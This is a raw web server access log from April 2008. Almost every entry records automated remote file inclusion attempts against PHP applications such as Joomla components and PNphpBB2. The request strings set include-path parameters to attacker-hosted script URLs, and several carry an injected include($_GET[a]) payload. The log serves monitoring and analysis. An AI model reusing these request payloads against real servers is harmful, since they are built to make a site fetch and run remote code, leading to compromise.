89.42.133.2 - - [23/Apr/2008:12:17:04 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:17:04 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:17:05 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.149.179.203 - - [23/Apr/2008:12:17:56 -0700] "GET /logs/access.log/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [23/Apr/2008:12:17:56 -0700] "GET /errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [23/Apr/2008:12:17:57 -0700] "GET /logs/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.166.61.155 - - [23/Apr/2008:12:17:59 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
219.166.61.155 - - [23/Apr/2008:12:18:00 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:18:11 -0700] "GET /logs/access_080304.log/joomla/index.php?option=com_restaurante&task=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.104.101.246 - - [23/Apr/2008:12:18:27 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
89.111.176.20 - - [23/Apr/2008:12:18:31 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:18:32 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:18:33 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:18:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:18:38 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:18:38 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:18:40 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:19:04 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:19:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:19:07 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:19:21 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:19:22 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:19:22 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:27 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 200 4123 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:30 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:32 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:33 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 200 4123 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:38 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:19:40 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 200 4123 "-" "libwww-perl/5.36" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:20:01 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:12:20:12 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:12:20:13 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:20:28 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:20:40 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:20:46 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:20:46 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [23/Apr/2008:12:20:46 -0700] "GET /view.php?sub=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:20:52 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:20:58 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:20:59 -0700] "GET /main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:20:59 -0700] "GET /logs/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:12:21:13 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:12:21:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:12:21:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.74.155 - - [23/Apr/2008:12:21:19 -0700] "GET /blog/index.php/feed HTTP/1.1" 200 6205 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "dmulk.com"
213.246.51.45 - - [23/Apr/2008:12:21:24 -0700] "GET /view.php?sub=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:21:30 -0700] "GET /logs/access_080215.log/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [23/Apr/2008:12:21:31 -0700] "GET /logs/access_080215.log/errors.php?error=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:21:31 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:21:31 -0700] "GET /main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:21:32 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:21:32 -0700] "GET /logs/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:21:32 -0700] "GET /main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:21:32 -0700] "GET /logs/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:21:40 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:21:41 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:21:45 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 200 4123 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:21:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:21:46 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:21:47 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 200 4123 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:21:57 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:22:00 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 200 4123 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:22:01 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET%5Ba%5D),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:22:12 -0700] "GET /logs/access_080225.log/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:22:14 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:22:15 -0700] "GET /logs/access_080305.log/include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:22:15 -0700] "GET /logs/access_080305.log/include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:22:16 -0700] "GET /include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:22:16 -0700] "GET /include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:22:16 -0700] "GET /logs/include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:22:16 -0700] "GET /logs/include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:22:53 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:22:54 -0700] "GET /main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:22:54 -0700] "GET /logs/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:23:03 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:23:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:24:34 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:24:53 -0700] "GET /logs/access_080329.log/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:24:53 -0700] "GET /main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:24:53 -0700] "GET /logs/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:08 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:10 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:13 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:15 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:21 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:24 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:25:24 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:25:49 -0700] "GET /logs/access_080305.log/include/Classes.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:25:50 -0700] "GET /include/Classes.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:12:25:50 -0700] "GET /logs/access_080219.log/main.php?sayfa=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:25:50 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
